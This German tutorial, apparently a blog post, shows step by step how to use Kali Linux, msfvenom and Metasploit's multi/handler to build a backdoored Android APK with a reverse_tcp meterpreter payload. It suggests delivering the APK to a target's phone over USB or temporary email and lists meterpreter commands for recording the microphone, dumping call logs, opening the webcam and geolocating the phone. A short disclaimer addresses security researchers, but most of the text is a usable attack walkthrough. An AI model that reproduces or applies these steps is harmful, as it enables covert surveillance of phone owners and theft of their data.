So greifen Sie mit Kali Linux auf ein Android-Telefon zu
Ein Android-Smartphone ist oft ein Tor zu den meisten kommerziellen IoT-Geräten. Ein Nest-Rauchmelder wird über eine entsprechende Android-App verwaltet. Ebenso eignet sich ein Nest-Thermostat zur Steuerung der Temperatur. Intelligente Schlösser, Türklingelkameras – auf fast alle intelligenten Geräte kann über Alexa oder andere Master-Apps zugegriffen werden. Was wäre, wenn jemand Fernzugriff auf ein solches Android-Telefon erhalten würde? Sie halten das für unmöglich? Zu diesem Zweck geben wir eine grundlegende Demo, wie ein Kali-Linux-Metasploit verwendet werden kann, um einen Hintertüreintrag für Ihr Android-Telefon zu erstellen.
Hinweis: Dieses Tutorial richtet sich an Sicherheitsforscher und Bastler. Wir empfehlen nicht, das Telefon einer anderen Person ohne deren Erlaubnis zu hacken.
Hintergrund
Bevor Sie mit der Arbeit an Kali Linux beginnen, müssen Sie sich zunächst mit dem Konsolenterminal vertraut machen.
Es bietet problemlos eine umfassende Liste von Tools, die auf die Firmware oder das Betriebssystem eines Geräts abzielen.
Hier verwenden wir eines der gängigen Tools namens „MSFVenom“, um einen Virus in ein Android-Telefon einzuschleusen. Es generiert mehrere Arten von Nutzlasten basierend auf den vom Benutzer ausgewählten Optionen. Der Exploit funktioniert auf vielen Plattformen, darunter Windows, Android, OpenBSD, Solaris, JAVA, PHP und Gaming-Hardware.
Starten eines Android-Metasploits
Die folgenden Schritte zeigen, wie Sie MSFVenom auf ein Kali-Linux-System herunterladen.
Starten Sie das Terminal und geben Sie den folgenden Befehl ein.
msfvenom - p android/meterpreter/reverse_tcp L HOST=IP address LPORT=Number R > /root/LOCATION/hackand.apk
Hier wird die Nutzlast mithilfe einer Exploit-Erweiterung namens „Meterpreter“ gestartet.
Um die IP-Adresse des Listener-Hosts zu ermitteln, öffnen Sie ein neues Konsolenterminal und geben Sie ifconfig
ein. Normalerweise wird Port 4444 für Trojaner, Exploits und Viren zugewiesen.
Sobald die IP-Adresse ermittelt wurde, kehren Sie zum vorherigen Bildschirm zurück und geben Sie die Details ein.
Die Datei „hackand.apk“ wird auf dem Desktop gespeichert und ist der wichtigste Backdoor-Exploit, der auf dem Android-Telefon verwendet werden kann.
Starten Sie im nächsten Schritt „msfconsole“, ein gängiges Penetrationstest-Tool, das mit Kali Linux verwendet wird. Geben Sie dazu service postgresql start
gefolgt von msfconsole
ein. PostgreSQL bezieht sich auf eine Datenbank, in der die Konsole gespeichert wurde.
Sobald das Penetrationstool bereit ist, können Sie den verbleibenden Exploit starten.
Als nächstes wird eine ausführbare Datei namens „Multihandler“ verwendet.
use multi/handler
Sehen Sie sich das Bild unten an, um den Exploit mit der Konsole zu verbinden. Es werden dieselben IP-Adressen und Portnummern verwendet.
Im nächsten Schritt wird der msfvenom-Exploit mit einem einfachen exploit
-Befehl gestartet und initialisiert. Jetzt müssen wir ein Ziel finden, bei dem es sich um ein Android-Telefon handelt.
Verbinden des Kali Linux-Terminals mit einem Android-Telefon
Die Datei hackand.apk, die wir zuvor heruntergeladen haben, ist nur 10 KB groß. Sie müssen einen Weg finden, die Datei in das Telefon des Ziels einzufügen. Sie können den Virus über USB oder einen temporären E-Mail-Dienst übertragen.
Im Allgemeinen weigern sich Webmail-Anbieter wie Gmail oder Yahoo, diese mit Viren infizierte Datei zu übertragen.
Android warnt Sie, bevor Sie die Software installieren. Die Installation dauert jedoch nur weniger als 20 Sekunden, da Sie nur „das Risiko ignorieren und installieren“ müssen. Dies macht die Bedrohung recht ernst, wenn sich Ihr Telefon im Entsperrmodus befindet.
Wie hier gezeigt, kann dem Telefon viel Schaden zugefügt werden, z. B. durch Ändern des Speicherinhalts, Verhindern des Ruhezustands des Telefons, Herstellen und Trennen einer WLAN-Verbindung, Festlegen eines Hintergrundbilds und mehr.
Sobald die APK-Datei installiert ist, kann sie geschickt im Telefon getarnt werden.
Jetzt können Sie auf dem Kali Linux-Terminal viele Befehle wie die folgenden verwenden, um das Telefon zu steuern. Sie müssen sie sich nicht wirklich merken, da die Liste über eine einfache help
-Option in meterpreter
verfügbar ist.
record_mic
: Aufnahme des Mikrofonsdump calllog
: Ruft das Anrufprotokoll abwebcam_chat
: Starten Sie einen Video-Chatgeolocate
: Ermitteln Sie den aktuellen Standort des Telefons
Die meisten modernen Android-Telefone verhindern die Installation dieser schädlichen App. Daher funktioniert dieser Exploit im Allgemeinen mit älteren Android-Modellen.
Lesen Sie auch: 14 der besten Hacking-Apps für Android
Gedanken
In diesem Tutorial haben wir eine grundlegende Strategie gesehen, wie man mit Kali Linux Zugriff auf ein Android-Smartphone erhält. Obwohl es sich hierbei um einen sehr einfachen Exploit handelt, hat er große Auswirkungen auf die IoT-Sicherheit.
Was halten Sie von Kali-Linux-Exploits? Werden Sie bei der Sicherheit Ihres Telefons vorsichtiger sein? Lass es uns in den Kommentaren wissen.